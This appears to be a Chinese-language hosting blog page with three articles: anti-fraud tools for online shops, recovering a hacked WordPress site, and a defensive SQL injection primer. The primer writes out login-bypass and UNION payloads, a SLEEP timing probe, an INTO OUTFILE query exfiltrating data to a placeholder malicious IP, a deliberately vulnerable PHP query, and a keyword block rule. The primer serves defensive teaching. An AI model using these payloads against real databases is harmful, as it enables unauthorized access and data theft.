    HTTP和HTTPS有什么区别?一句话,加密。HTTPS与另一种协议安全套接字层 (SSL)一起使用,以保护在互联网上“移动”的数据。HTTP(没有S)没有,所以 HTTPS 总是更好地避免黑客。可以将其视为S 代表安全性。

    HTTPS还有其他好处,例如更好的SEO排名和更准确的推荐数据。如果您使用的是WordPress,请阅读我们关于如何从HTTP切换到HTTPS的深入指南。如果您正在管理WooCommerce商店,这里是安装SSL证书的方法。

    更安全的密码

    最后但并非最不重要的一点是,您可以通过要求客户拥有更安全、更复杂的密码来与客户分担安全负担。当然,没有人喜欢那些烦人的密码要求,尤其是如果他们在大量网站上拥有帐户……但实际上,被信用卡诈骗所困扰比记住新密码要麻烦得多。

    目前,行业标准是八个字符、一个大写字母和一个特殊字符。另一个比这更少的是风险,为了提高安全性,您可以添加更多要求,例如数字,甚至是随机生成的密码。

    电子商务欺诈预防的10大最佳工具

    在与欺诈作斗争的过程中,您并不孤单,如果您知道去哪里寻找,那么您有大量的盟友。以下是预防电子商务欺诈的10款最佳软件。

    1. Signifyd

    Signifyd

    Signifyd

    Signifyd的规模可伸缩以适应大型和小型企业,是最先寻找欺诈预防软件的地方之一。它在您商店的后端运行,并根据欺诈的可能性为每次购买分配一个“分数”。

    用户可以选择自己处理案件或寻求Signifyd团队的帮助。他们还为特定订单提供保险,以防万一出现您无法确定的可疑情况,让您更加安心。

    2. Sift

    Sift

    Sift

    前身为Sift Science的欺诈预防工具Sift面向高端商店——更多功能,更多钱。虽然您可以购买单独的套餐,但全套套餐提供:

    • 订单评估
    • 假账户预防
    • 帐户接管预防
    • 滥用促销预防
    • 内容的垃圾邮件预防
    • 设备指纹识别API

    Sift将其机器学习吹捧为业内最好的之一,因此也许这与其他功能一起证明了价格标签的合理性。

    3. Simility

    Simility

    Simility

    Simility专注于“设备指纹识别”,识别设备并评估其威胁级别。通过监控设备的数据——位置、操作系统、语言、网络浏览器、用户名,甚至电池电量!— Simility将设备与任何黑名单进行交叉引用,并确定其威胁级别。

    4.DupZapper

    Dupzapper

    Dupzapper

    DupZapper易于使用、安装快速且无需API集成,是一款低维护、高回报的软件。他们的算法旨在规范在线游戏,检测重复帐户、地理一致性、cookie阻止和代理使用等。如果您正在寻找轻松轻松的欺诈预防工具,这是我们的建议。

    5.Kount

    Kount

    Kount

    Kount是大通银行和GNC等全球企业的最爱,是另一种高成本、高质量的选择。如果您有预算,Kount会使用一些最先进的技术来访问交易风险,利用200多个数据变量。他们的系统也是最快的系统之一,响应时间不到一秒(准确地说是300毫秒)。对于预算庞大的大公司,这种速度在处理您的日常订单时会很有用。

    6. Subuno

    Subuno

    Subuno

    Subuno以其低廉的价格提供了很多:20多种欺诈检测工具,可分析100多种风险因素。对于那些预算不多但仍然优先考虑网站安全的人来说,这是一个首选,尤其是考虑到它适用于Shopify和WooCommerce等电子商务网站。

    7. Riskified

    Riskified

    Riskified

    Riskified在几个方面将自己与其他电子商务欺诈预防软件区分开来。首先,他们使用闪电般的实时报告。如果您想要Kount等高端软件的速度,但又没有企业级定价,这是一个不错的选择。

    撇开“欺诈评分”模型不谈,Riskified为每个订单提供了清晰的“批准/拒绝”分析。它还适用于滑动规模,您只需为产生销售的已批准订单付费,这为小型在线商店提供了一个明智的选择。

    8. FraudLabs Pro

    FraudLabs Pro

    FraudLabs Pro

    与此列表中的其他欺诈预防工具相比, FraudLabs Pro具有几个强大的优势。也就是说,它使用独特的检测方法,包括对电子邮件(如电子邮件域年龄)、社交媒体、ISP和用户名的真实性检查。

    但另一个优势更有吸引力:一个可行的免费 计划,每月接受多达500个查询。对于刚刚推出的小商店或品牌来说,这是在线安全的幸运发现。

    9. Forter

    Forter

    Forter

    Forter针对移动交易进行了优化,几乎可以为任何交易提供广泛、全面的覆盖,无论地理位置或支付方式如何。它最受欢迎的功能之一是其定制选项,允许用户关注特定的风险概况或支付网关。它还使用快速、实时的报告,带有简单的“是/否”报告,而不是欺诈分数。

    10. Bolt

    Bolt

    Bolt

    从技术上讲,Bolt与其说是防欺诈解决方案,不如说是一种结账UI解决方案……但是,由于防欺诈内置于其系统中,因此它兼具两者的资格。Bolt是针对欺诈检测和用户体验的优化结账系统,旨在通过可用性增加销售额并减少放弃。

    Bolt在结账期间扫描200多个行为数据点以评估风险。再加上它的可用性优势,使其成为在线商店的绝佳选择,这些在线商店需要更多领域的帮助,而不仅仅是在线安全。

    小结

    您的欺诈预防安全措施直接提高了您的电子商务品牌的成功——或者更准确地说,您未能防止欺诈计划直接阻碍了您的成功。随着电子商务欺诈的增加,安全性现在比以往任何时候都成为在线商店更高的优先级。

    幸运的是,如果你保持警惕,你可以避开它。查看上面列出的7种最常见的骗局,可以这么说,让您“了解您的敌人”,并为即将发生的事情做好准备。同样,请查看我们概述的警告标志和危险信号,以便您可以在欺诈尝试仍然只是“尝试”时发现它们。

    我们列出了有效的DIY电子商务欺诈预防方法——任何在线商店所有者都可以从头开始自己实施的技术。但是您的电子商务品牌越大,您需要的外部帮助就越多。排名前10位的欺诈预防工具适合每个人,因此请查看我们的评估,找到最适合您的需求、目标和限制的工具。

  • 当您的WordPress网站被黑时该怎么办

    当您的WordPress网站被黑时该怎么办

    WordPress网站被黑。如果它发生在你身上,很容易恐慌。在这篇文章中,我将帮助您确定您的网站是否被黑客入侵,指导您完成清理网站的步骤并帮助您提高网站的安全性。

    最后,我将为您提供一些提示,以防止您的WordPress网站将来再次被黑客入侵。

    1. WordPress被黑:表明您的WordPress网站存在风险
    2. 为什么WordPress网站会被黑客入侵
    3. WordPress如何被黑客入侵?
    4. WordPress网站被黑:怎么办(分步指南)
    5. 如何防止您的WordPress网站被黑客入侵

    WordPress被黑:表明您的WordPress网站存在风险

    您的WordPress网站未按应有的方式运行。但是你怎么知道这个问题是由于黑客攻击造成的?让我们看一下您的网站已被黑客入侵的一些迹象:

    • 无法登录
    • 您的网站在您没有做任何事情的情况下发生了变化(例如,主页已被静态页面替换或添加了新内容)。
    • 您的网站正在重定向到另一个网站。
    • 当您或其他用户尝试访问您的网站时,您会在浏览器中收到警告。
    • 当您搜索您的网站时,Google会发出警告,表明它可能已被黑客入侵。
    • 您已收到来自安全插件的违规通知或意外更改通知。
    • 您的托管服务提供商已警告您有关您帐户的异常活动。

    让我们更详细地看一下其中的每一个。

    您无法登录

    如果您无法登录您的网站,则可能表明您的网站已被黑客入侵。但是,您更有可能刚刚忘记了密码。因此,在您假设您已被黑客入侵之前,请尝试重置您的密码。如果你不能,那是一个警告信号。即使可以,您可能仍然被黑客入侵,您必须进行更多调查。

    黑客有时会删除用户或更改用户密码以阻止访问。如果您无法重置密码,则您的用户帐户可能已被删除,这是黑客入侵的迹象。

    您的网站已更改

    黑客的一种形式是用静态页面替换主页。如果您的网站看起来完全不同并且没有使用您的主题,则它可能已被黑客入侵。

    这些更改可能更加微妙,可能会添加虚假内容或指向令人讨厌的网站的链接。如果您的页脚充满了您没有添加的链接,特别是如果这些链接被隐藏或字体很小,那么您可能已被黑客入侵。

    在您假设您已被黑客入侵之前,请与其他网站管理员或编辑核实,以确保他们没有意外进行更改。

    如果您的主题不是来自信誉良好的来源并且您最近更新了它,那可能是罪魁祸首。

    您的网站正在重定向

    有时,黑客会添加一个脚本,当人们访问您的站点时将其重定向到另一个站点。这可能是您不希望您的用户被带到的网站。

    当我管理的一个学校网站重定向到一个约会网站时,这发生在我身上。正如你可以想象的那样,我的客户很不高兴,不得不放弃我正在做的所有其他事情并立即修复它。事实证明,这是服务器上的不安全问题,而不是我的网站上的安全问题,这是只使用优质托管的原因之一。我尽快更换了托管服务提供商并几乎立即修复了这个问题。

    浏览器警告

    如果您的浏览器警告您的网站已被入侵,则可能表明您的网站已被黑客入侵。这也可能是由于您需要删除的主题或插件中的某些代码,或者是域或SSL的问题。

    请参阅浏览器中带有警告的建议,以帮助您诊断问题。

    搜索引擎警告

    当您搜索您的网站时,如果它被黑客入侵,Google可能会显示警告。这可能意味着站点地图已被黑客入侵,这将影响Google抓取您网站的方式。或者这可能是一个更大的问题:您需要进行下面的诊断以确切了解发生了什么。

    谷歌警报 - 该网站可能已被黑客入侵

    谷歌警报 – 该网站可能已被黑客入侵

    为什么WordPress网站会被黑客入侵

    WordPress网站被黑的原因有很多,但这里是最常见因素的概述。

    1. 不安全的密码

    这是黑客入侵的最常见原因之一。世界上最常用的密码是“密码”。安全密码不仅适用于您的WordPress管理员帐户,而且适用于您的所有用户和网站的所有方面,包括FTP和托管。

    2. 过时的软件

    插件和主题,以及WordPress本身,都受到需要应用到您网站的安全更新的约束。如果您不使您的主题、插件和 WordPress 版本保持最新,那么您的网站就会容易受到攻击。

    3.不安全的代码

    并非来自可靠来源的插件和主题可能会给您的网站带来漏洞。如果您需要免费的WordPress主题或插件,请从官方主题目录安装它们。

    购买高级主题和插件时,请务必检查供应商的声誉,并从您信任的人和来源获得推荐。切勿安装无效插件,它们是来自免费网站的高级插件,旨在造成伤害或收集信息。

    WordPress如何被黑客入侵?

    如果您想了解更多有关WordPress 网站如何被黑客入侵的信息(如果您自己的网站被黑客入侵,您不会急于采取措施),以下是黑客进入您网站的主要途径:

    • 后门——这些绕过访问您网站的正常方法,例如通过脚本或隐藏文件。一个例子是2013年的Tim Thumb漏洞
    • Pharma hacks – 一种用于将恶意代码插入到过时版本的WordPress中的漏洞。
    • 暴力登录尝试——当黑客使用自动化来利用弱密码并获得对您网站的访问权限时。
    • 恶意重定向 – 当使用后门将恶意重定向添加到您的网站时。
    • 跨站脚本 (XSS) – WordPress插件中最常见的漏洞,这些注入脚本允许黑客向用户的浏览器发送恶意代码。
    • 拒绝服务 (DoS) – 当网站代码中的错误或错误被用来淹没网站,使其不再运行时。

    如果您经营的是电子商务网站,请务必阅读我们关于电子商务欺诈预防的深入指南

    这些听起来都很吓人,但是您可以采取一些措施来保护您的 WordPress 网站免受它们的侵害。首先,让我们完成当您的网站被黑客入侵时需要采取的步骤。

    WordPress网站被黑:怎么办(分步指南)

    您需要采取的步骤取决于您的网站被黑客入侵的方式,您可能不需要完成所有这些工作。我们将经历的步骤是:

    1. 不要惊慌
    2. 将您的网站置于维护模式
    3. 重置密码
    4. 使用恶意软件删除服务
    5. 更新插件和主题
    6. 删除用户
    7. 删除不需要的文件
    8. 清理您的站点地图
    9. 重新安装插件和主题
    10. 重新安装WordPress核心
    11. 清理你的数据库

    第 1 步:不要惊慌

    我知道你能对惊慌失措的人说的最糟糕的话就是“不要惊慌”。但是,如果您要能够诊断和解决问题,您需要有一个清醒的头脑。

    如果您无法正确思考,只需将您的站点置于维护模式并放置几个小时,直到您感觉平静。再一次,这听起来说起来容易做起来难,但它在这里至关重要。

    第 2 步:将您的站点置于维护模式

    您不希望访问者发现您的站点处于受损状态,也不希望他们在您修复站点时看到您的站点的外观。

    因此,如果可以,请将其置于维护模式。

    如果您现在无法登录您的WordPress网站,这将是不可能的,但请尽快返回并执行此操作。

    Coming Soon Page & Maintenance Mode这样的插件可以让您将您的网站置于维护模式,使其看起来好像正在进行定期维护,而不是在被黑客入侵后得到修复。

    Coming Soon Page & Maintenance Mode插件

    Coming Soon Page & Maintenance Mode插件

    完成此操作后,您可以放松一点,因为知道人们看不到正在发生的事情。

    您可以配置插件以添加徽标并自定义颜色,或者您可以输入一些快速解释性文本并将其保留。

    现在您可以看到损坏的网站,但其他人看不到。

    第 3 步:使用恶意软件删除服务

    为了省去以下所有步骤的麻烦,如果你的服务器提供商有恶意软件清除服务,掏腰包解决问题吧。

    第 4 步:重置密码

    由于您不知道使用哪个密码来访问您的网站,因此更改所有密码以防止黑客再次使用它们很重要。这不仅限于您的WordPress密码:重置您的SFTP密码、您的数据库密码以及您的托管服务提供商的密码。

    您需要确保其他管理员用户也重置他们的密码。

    第 5 步:更新插件和主题

    下一步是确保所有插件和主题都是最新的。转到您网站中的仪表盘 > 更新 并更新所有过时的内容。

    您应该在尝试任何其他修复之前执行此操作,因为如果插件或主题使您的网站易受攻击,则您所做的任何修复都可能被该漏洞撤消。因此,在继续之前确保一切都是最新的。

    第 6 步:删除用户

    如果您不认识任何管理员帐户已添加到您的WordPress网站,则该删除它们了。在您执行此操作之前,请与任何授权管理员确认他们没有更改其帐户详细信息,而您只是不认识他们。

    转到WordPress管理员中的用户屏幕,然后单击用户列表上方的管理员链接。如果有任何不应该出现的用户,请单击他们旁边的复选框,然后在批量操作下拉列表中选择删除 。

    第 7 步:删除不需要的文件

    要确定您的WordPress安装中是否有任何不应该存在的文件,您需要安装一个安全插件,例如WordFence,它会扫描您的网站并告诉您是否有任何不应该存在的文件,或使用诸如Sucuri之类的安全服务。

    第 8 步:清理您的站点地图并重新提交给Google

    网站被搜索引擎标记为红色的原因之一可能是您的sitemap.xml文件被黑客入侵。

    您可以使用SEO插件重新生成站点地图,但您还需要告诉Google该站点已被清理。将您的网站添加到Google Search Console并向 Google提交站点地图报告,告诉他们您需要抓取该网站。这并不能保证您的网站会立即被抓取,最多可能需要两周时间。您无法采取任何措施来加快速度,因此您必须耐心等待。

    第 9 步:重新安装插件和主题

    如果您的网站仍然存在问题,则需要重新安装尚未更新的所有插件和主题。停用并从您的主题插件页面中删除它们,然后重新安装它们。如果您尚未将站点置于维护模式,请先执行此操作!

    如果您从插件或主题供应商处购买了插件或主题并且您不确定它的安全性,那么现在是考虑是否应该继续使用它的时候了。如果您从WordPress插件或主题目录以外的任何地方下载了免费主题/插件,请不要重新安装它。相反,从主题或插件目录安装它或购买合法版本。如果您买不起,请将其替换为主题或插件目录中的免费主题/插件,该主题或插件执行相同或类似的工作。

    如果这不能解决问题,请查看所有主题和插件的支持页面。可能是其他用户遇到了问题,在这种情况下,您应该卸载该主题或插件,直到漏洞得到修复。

    第 10 步:重新安装WordPress核心

    如果一切都失败了,您将需要重新安装WordPress本身。如果WordPress核心中的文件遭到破坏,您需要用干净的WordPress安装替换它们。

    通过SFTP将一组干净的WordPress文件上传到您的网站,确保覆盖旧文件。备份wp-config.php和. htaccess文件首先,以防这些被覆盖(尽管它们不应该被覆盖)。

    如果您使用自动安装程序来安装WordPress,请不要再次使用它,因为它会覆盖您的数据库并且您会丢失您的内容。相反,仅使用SFTP上传文件。

    第 11 步:清理数据库

    您的数据库已被黑客入侵,您也需要清理它。清理数据库是一个好主意,因为干净的数据库将减少陈旧数据并占用更少的空间,从而使您的站点更快。

    你怎么知道你的数据库是否被黑客入侵了?如果您正在使用安全插件或服务,通过它运行扫描将告诉您数据库是否已被破坏(或者您可能已收到警报)。或者,您可以使用像NinjaScanner这样的插件来扫描您的数据库。

    WP-Optimize插件可让您清理数据库并为未来优化。

    如何防止您的WordPress网站被黑客入侵

    所以你已经清理了你的网站,你已经重置了你的密码,所以它比以前更安全了。

    但是,您还可以做更多的事情来防止未来的黑客攻击并避免再次发生同样的事情。

    1.确保所有密码都是安全的

    如果您还没有,请确保与您的网站相关的所有密码(不仅仅是您的 WordPress 管理员密码)都已重置,并且您使用的是强密码。

    安全插件可让您强制用户使用安全密码。

    您还可以向您的网站添加双重身份验证,以使黑客更难创建帐户。

    2.保持您的网站更新

    让您的网站保持最新很重要。每次更新您的主题、插件或WordPress本身时,您都应该运行该更新,因为它通常包含安全补丁。

    您可以通过编辑wp-config.php文件或安装插件来启用自动更新。如果您不想这样做,因为您想先测试更新,安全插件会在您需要运行更新时通知您。

    3. 不要安装不安全的插件或主题

    将来安装WordPress插件时,请确保它们已使用您的WordPress版本进行了测试,并且您从信誉良好的来源下载它们。

    始终通过主题和插件目录安装免费插件和主题:不要试图从第三方站点获取它们。如果您要购买高级主题或插件,请检查插件供应商的声誉并寻求建议。

    4.清理你的WordPress安装

    如果您安装了任何主题或插件但未激活,请删除它们。如果您的托管环境中有任何未使用的文件或旧WordPress安装,是时候删除它们了。删除您不使用的任何数据库。

    如果您的服务器上有旧的、未使用的WordPress安装,它们将特别容易受到攻击,因为您不太可能使它们保持最新状态。

    5. 在您的网站上安装SSL

    SSL将为您的站点增加一层安全性。如果您的托管服务提供商不提供免费SSL,您可以使用SSL Zen插件添加免费的Let’s Encrypt SSL。

    6.避免廉价托管

    廉价托管意味着您将与数百个其他客户端共享服务器空间。这不仅会减慢您的站点速度,还会增加其他站点之一向服务器引入不安全性的机会。

    廉价的托管服务提供商不太可能可靠地监控服务器安全性或在您的网站被黑客入侵时为您提供帮助。=

    7.设置防火墙

    安全插件或CloudflareSucuri等服务可让您为您的站点配置防火墙。这将为黑客增加额外的障碍,并减少您的网站遭到黑客攻击和DDoS 攻击的机会。

    8. 安装安全插件

    如果您在网站上安装安全插件,它会通知您任何可疑活动。这可能包括未经授权的登录或添加不应存在的文件。

    同样,请参阅插件提供的警告以找出问题所在。

    9.考虑一个安全服务

    您可能需要考虑像Sucuri这样的安全服务,它会监控您的网站并在您再次被黑客入侵时修复它。

    Sucuri

    Sucuri

    它并不便宜,但如果您的网站对您的业务收入至关重要,它可以收回成本。有不同的计划为安全修复提供不同的周转时间。Sucuri将监控您的网站,在存在安全漏洞时提醒您,并为您修复。这意味着您不必再次自己清理网站。

    或者,服务器提供商附带安全功能,包括DDoS检测、正常运行时间监控、硬件墙和无黑客保证,这意味着如果您的网站被黑客入侵,我们将为您清理它。

    小结

    让您的网站被黑是一种不愉快的体验。这意味着您的网站对用户不可用,这可能会影响您的业务。这意味着您必须迅速采取行动,这将影响您的其他活动。

    如果您的网站被黑客入侵,以下是您需要采取的步骤的回顾:

    • 重置密码。
    • 更新插件和主题。
    • 删除不应该存在的用户。
    • 删除不需要的文件。
    • 清理您的站点地图。
    • 重新安装插件和主题,以及WordPress核心。
    • 如有必要,清理您的数据库。

    请记住:按照上述步骤防止黑客攻击将避免您将来不得不再次执行所有这些操作:让您的网站尽可能安全是值得的。

  • SQL注入:WordPress用户入门指南

    SQL注入:WordPress用户入门指南

    SQL(结构化查询语言)是一种允许我们与数据库交互的语言。现代Web应用程序使用数据库来管理数据并向读者显示动态内容。

    SQL注入或SQLi是一种对Web应用程序的攻击,通过恶意SQL语句破坏其数据库。

    由于这是一种常见的攻击,让我们尝试更多地了解它是什么,它是如何发生的,以及如何保护自己免受它的侵害。

    1. 什么是SQL注入?
    2. SQL注入漏洞是如何工作的?
    3. SQL注入的类型
    4. 如何防止SQL注入
    5. WordPress中的SQL注入
    6. SQL注入是非法的吗?

    什么是SQL注入?

    SQL注入或SQLi是对Web应用程序的一种攻击,它使攻击者能够将恶意SQL语句插入到Web应用程序中,从而可能获得对数据库中敏感数据的访问权或破坏这些数据。SQL注入首先由Jeff Forristal于1998年发现。

    自发现以来的二十年里,SQL 注入一直是Web开发人员在设计应用程序时的重中之重。

    Barclaycard在2012年估计,97%的数据泄露是由SQL注入攻击引发的。即使在今天,SQL注入也很普遍,并且Web应用程序中注入攻击的严重性已得到广泛认可。它是OWASP十大最关键的 Web 应用程序安全风险之一

    SQL注入漏洞是如何工作的?

    SQL注入漏洞使攻击者可以通过使用恶意SQL语句完全访问您的应用程序的数据库。

    在本节中,我们将分享一个易受攻击的应用程序的示例。

    想象一下典型Web应用程序的工作流程,其中涉及通过用户输入的数据库请求。您通过表单获取用户输入,例如登录表单。然后,您使用用户提交的字段查询您的数据库以对其进行身份验证。对数据库的查询结构如下所示:

    select * from user_table
    where username = ‘sdaityari’
    and password = ‘mypassword’;
    select * from user_table
    where username = ‘sdaityari’
    and password = ‘mypassword’;
    select * from user_table
    where username = 'sdaityari'
    and password = 'mypassword';
    

    为简单起见,假设您将密码存储为明文。但是,对salt your passwords然后对其进行散列处理是一种很好的做法。继续前进,如果您从表单中收到用户名和密码,您可以在PHP中定义查询,如下所示:

    // Connect to SQL database
    $db_query = “select * from user_table where
    username = ‘”.$user.“‘
    AND password = ‘”.$password.“‘;”;
    // Execute query
    // Connect to SQL database
    $db_query = “select * from user_table where
    username = ‘”.$user.”‘
    AND password = ‘”.$password.”‘;”;
    // Execute query
    // Connect to SQL database
    $db_query = "select * from user_table where
    username = '".$user."'
    AND password = '".$password."';";
    // Execute query
    

    如果有人在用户名字段中输入值“admin’;–”,则变量 $db_query 生成的SQL查询将如下所示:

    select * from user_table where
    username = ‘admin’;–‘ and password = ‘mypassword’
    select * from user_table where
    username = ‘admin’;–‘ and password = ‘mypassword’
    select * from user_table where
    username = 'admin';--' and password = 'mypassword'

    这个查询有什么作用?

    SQL中的注释以双破折号 (–) 开头。结果查询仅按用户名过滤,不考虑密码。如果没有适当的安全措施来避免这种情况,您只需使用此技巧即可获得对Web应用程序的管理访问权限。

    或者,在此示例中也可以使用布尔攻击来获取访问权限。如果攻击者在密码字段中输入“password”或 1=1;–”,则查询结果如下:

    select * from user_table where
    username = ‘admin’ and
    password = ‘password’ or 1=1;–‘;
    select * from user_table where
    username = ‘admin’ and
    password = ‘password’ or 1=1;–‘;
    select * from user_table where
    username = 'admin' and
    password = 'password' or 1=1;--';
    

    在这种情况下,即使您的密码错误,您也将通过身份验证进入应用程序。如果您的网页显示数据库查询的结果,攻击者可以使用命令show tables,命令显示数据库中的表,然后根据需要选择性地删除表。

    SQL注入漫画

    SQL注入漫画(图片来源:XKCD

    XKCD的流行漫画《妈妈的剥削》展示了一位母亲与她儿子所在学校的对话,她被问到她是否真的给儿子取名为“罗伯特”);放表学生;——”。

    SQL注入的类型

    现在您已经了解了SQL注入漏洞的基础知识,让我们来探索各种类型的SQL注入攻击以及每种攻击背后的原因。

    带内SQL注入

    带内SQL注入(In-Band SQL Injection)是最简单的SQL注入形式。在这个过程中,攻击者能够使用同一通道将恶意SQL代码插入应用程序并收集结果。我们将讨论两种形式的带内SQL注入攻击:

    基于错误的攻击

    攻击者在攻击的初始阶段使用基于错误的SQL注入技术。基于错误的SQL注入背后的想法是获取有关Web应用程序遵循的数据库结构和表名的更多信息。例如,错误消息可能包含查询中包含的表名和表的列名。然后可以使用此数据来创建新的攻击。

    基于联合的攻击

    在这种方法中,攻击者使用SQL联合连接来显示来自不同表的结果。例如,如果攻击者在搜索页面上,他们可能会附加来自另一个表的结果。

    select title, link from post_table
    where id < 10
    union
    select username, password
    from user_table; –;
    select title, link from post_table
    where id < 10
    union
    select username, password
    from user_table; –;
    select title, link from post_table
    where id < 10
    union
    select username, password
    from user_table; --;
    

    推理SQL注入(SQL盲注)

    即使攻击者在SQL查询中产生错误,查询的响应也可能不会直接传输到网页。在这种情况下,攻击者需要进一步探测。

    在这种形式的SQL注入中,攻击者向数据库发送各种查询,以评估应用程序如何分析这些响应。推理SQL注入有时也称为盲SQL注入(Blind SQL Injection)。我们将在下面查看两种推理SQL注入:布尔SQL注入和基于时间的SQL注入。

    布尔攻击

    如果SQL查询导致应用程序内部未处理的错误,则生成的网页可能会引发错误、加载空白页面或部分加载。在布尔SQL注入中,攻击者通过输入尝试两个不同版本的布尔子句来评估用户输入的哪些部分易受SQL注入攻击:

    • “… and 1=1”
    • “… and 1=2”

    如果应用程序在第一种情况下正常工作,但在第二种情况下显示异常,则表明该应用程序容易受到SQL注入攻击。

    基于时间的攻击

    基于时间的SQL注入攻击还可以帮助攻击者确定Web应用程序中是否存在漏洞。攻击者利用应用程序使用的数据库管理系统的预定义的基于时间的功能。例如,在MySQL中,函数sleep()指示数据库等待一定的秒数。

    select * from comments
    WHERE post_id=1SLEEP(15);
    select * from comments
    WHERE post_id=1-SLEEP(15);
    select * from comments
    WHERE post_id=1-SLEEP(15);
    

    如果这样的查询导致延迟,攻击者就会知道它是易受攻击的。

    带外SQL注入

    如果攻击者无法通过同一渠道收集SQL注入的结果。带外SQL注入(Out-of-Band SQL Injection)技术可以用作推SQL注入技术的替代方法。

    通常,这些技术涉及将数据从数据库发送到攻击者选择的恶意位置。这个过程也高度依赖于数据库管理系统的能力。

    带外SQL注入攻击使用DBMS的外部文件处理能力。在MySQL中,可以使用LOAD_FILE()和INTO OUTFILE函数来请求MySQL将数据传输到外部源。以下是攻击者如何使用OUTFILE将查询结果发送到外部源:

    select * from post_table
    into OUTFILE ‘\\MALICIOUS_IP_ADDRESSlocation’
    select * from post_table
    into OUTFILE ‘\\MALICIOUS_IP_ADDRESSlocation’
    select * from post_table
    into OUTFILE '\\MALICIOUS_IP_ADDRESSlocation'
    

    同样,可以使用LOAD_FILE()函数从服务器读取文件并显示其内容。LOAD_FILE()和OUTFILE的组合可用于读取服务器上文件的内容,然后将其传输到不同的位置。

    如何防止SQL注入

    到目前为止,我们已经探索了Web应用程序中可能导致SQL注入攻击的漏洞。攻击者可以使用SQL注入漏洞来读取、修改甚至删除数据库的内容。

    此外,它还可以使人们能够读取服务器内任何位置的文件并将内容传输到其他地方。在本节中,我们将探索各种技术来保护您的Web应用程序和网站免受SQL注入攻击。

    转义用户输入

    一般来说,判断用户字符串是否恶意是一项艰巨的任务。因此,最好的方法是在用户输入中转义特殊字符。

    此过程使您免受SQL注入攻击。您可以在PHP中使用mysql_escape_string() function. 您还可以使用该mysqli_real_escape_string()函数在MySQL中转义字符串。

    在将输出显示为HTML时,您还需要转换字符串以确保特殊字符不会干扰HTML标记。您可以使用函数转换PHP中的特殊字符htmlspecialchars()

    使用准备好的语句

    或者,您可以使用准备好的语句来避免SQL注入。准备好的语句是SQL查询的模板,您可以在稍后阶段指定参数来执行它。这是PHP和MySQLi中的准备语句示例。

    $query = $mysql_connection->prepare(“select * from user_table where username = ? and password = ?”);
    $query->execute(array($username, $password));
    $query = $mysql_connection->prepare(“select * from user_table where username = ? and password = ?”);
    $query->execute(array($username, $password));
    $query = $mysql_connection->prepare("select * from user_table where username = ? and password = ?");
    $query->execute(array($username, $password));

    防止SQL攻击的其他安全检查

    减轻此漏洞的下一步是将对数据库的访问限制在必要的范围内。

    例如,使用特定用户将您的Web应用程序连接到DBMS,该用户只能访问相关数据库。

    限制数据库用户对服务器所有其他位置的访问。您可能还希望通过Web服务器阻止URL中的某些SQL关键字。如果您将Apache用作Web服务器,则可以在.htaccess文件中使用以下代码行向潜在的攻击者显示403 Forbidden错误。

    在使用此技术之前您应该小心,因为如果URL包含这些关键字,Apache将向读者显示错误。

    RewriteCond %{QUERY_STRING} [^a-z](declare¦char¦set¦cast¦convert¦delete¦drop¦exec¦insert¦meta¦script¦select¦truncate¦update)[^a-z] [NC]
    RewriteRule (.*) – [F]
    RewriteCond %{QUERY_STRING} [^a-z](declare¦char¦set¦cast¦convert¦delete¦drop¦exec¦insert¦meta¦script¦select¦truncate¦update)[^a-z] [NC]
    RewriteRule (.*) – [F]
    RewriteCond %{QUERY_STRING} [^a-z](declare¦char¦set¦cast¦convert¦delete¦drop¦exec¦insert¦meta¦script¦select¦truncate¦update)[^a-z] [NC]
    RewriteRule (.*) - [F]

    作为额外的预防提示,您应该始终使用更新的软件。发布新版本或补丁时,更新中修复的错误会在发布说明中详细说明。一旦漏洞的详细信息公之于众,运行任何软件的旧版本都可能存在风险。

    WordPress中的SQL注入

    如果您使用的是最新的WordPress核心文件,则可以避免任何SQL注入漏洞。但是,当您使用第三方主题和插件时,您的整个应用程序都会面临风险。

    您的WordPress网站的强大程度取决于其最薄弱的链接。在本节中,我们将探讨缓解WordPress中的SQL注入漏洞的关键注意事项,以及如何在现有WordPress站点上执行漏洞检查。

    WordPress的SQL注入漏洞预防

    为了减轻WordPress主题或插件中的SQL注入漏洞,您必须遵循的一条规则是在与数据库交互时始终使用现有的WordPress函数

    这些函数在WordPress开发过程中针对SQL注入漏洞进行了全面测试。例如,如果您想在帖子中添加评论,请使用wp_insert_comment() 函数,而不是将数据直接插入到wp_comments表中。

    虽然函数是可扩展的,但您有时可能需要运行复杂的查询。在这种情况下,请确保使用$wp_db 函数组。您可以在创建查询之前使用 $wpdb->prepare() 转义用户输入。

    此外,这里是在WordPress中清理数据的函数列表。这些可以帮助您转义特定类型的用户输入,例如电子邮件和URL。

    保护您的WordPress网站

    虽然WordPress本身是安全的,但过时的核心软件和无效插件等问题可能会导致漏洞。虽然除了彻底检查WordPress网站是否存在SQL注入漏洞之外别无选择,但网站的复杂性可能使这项任务具有挑战性。

    您可以使用在线扫描工具,例如ThreatPassWPScan Vulnerability Database。您可以审核您的插件以查看它们的开发是否已停止。如果它们不久前被放弃,那么在您的网站上使用它们可能不是一个好主意。

    如果您仍然需要绝对使用它们,请确保彻底测试它们的代码和功能是否存在漏洞。除此之外,请确保您遵循以下安全检查:

    • 更新PHP、WordPress核心和MySQL
    • 更新第三方插件和主题
    • 避免使用root用户连接SQL数据库
    • 限制SQL用户对敏感目录的访问
    • 使用您的服务器阻止SQL关键字
    • 将您的站点备份保存在异地,以防发生不可逆转的损坏

    这是有关WordPress安全性的详细文章和详尽的检查列表。此外,您可能希望为WordPress投资这些顶级安全插件。尽管您尽了最大努力,但如果您的WordPress网站被黑客入侵,您应该采取以下措施。

    SQL注入是非法的吗?

    绝对,是的!即使存在实际漏洞,攻击者仍在尝试访问他们无法访问的数据。

    想象一下有人把钥匙留在车里的场景。仅仅因为它被打开和无人看管就构成犯罪吗?SQLi的行为受不同国家/地区的不同法律管辖。它属于美国的《计算机欺诈和滥用法》(1986 年)英国的《计算机滥用法》(1990 年)

    97%的数据泄露始于SQL注入。如果您正在运行一个站点,您应该知道什么是SQL注入以及如何防止它们发生。幸运的是,有这个指南!

    小结

    SQL注入漏洞很久以前就被发现了。然而,一份2018年关于被黑网站的报告表明,SQLi是WordPress在XSS攻击之后最常见的网站黑客行为。为防止它们发生,您应该:

    • 了解SQL注入漏洞的工作原理
    • 探索攻击者可能使用SQLi未经授权访问您的Web应用程序的各种方式
    • 实施保护您的网站免受SQLi攻击的方法,例如转义用户输入和使用准备好的语句
    • 遵循安全检查程序

    俗话说,“宁可安全,也不要后悔!”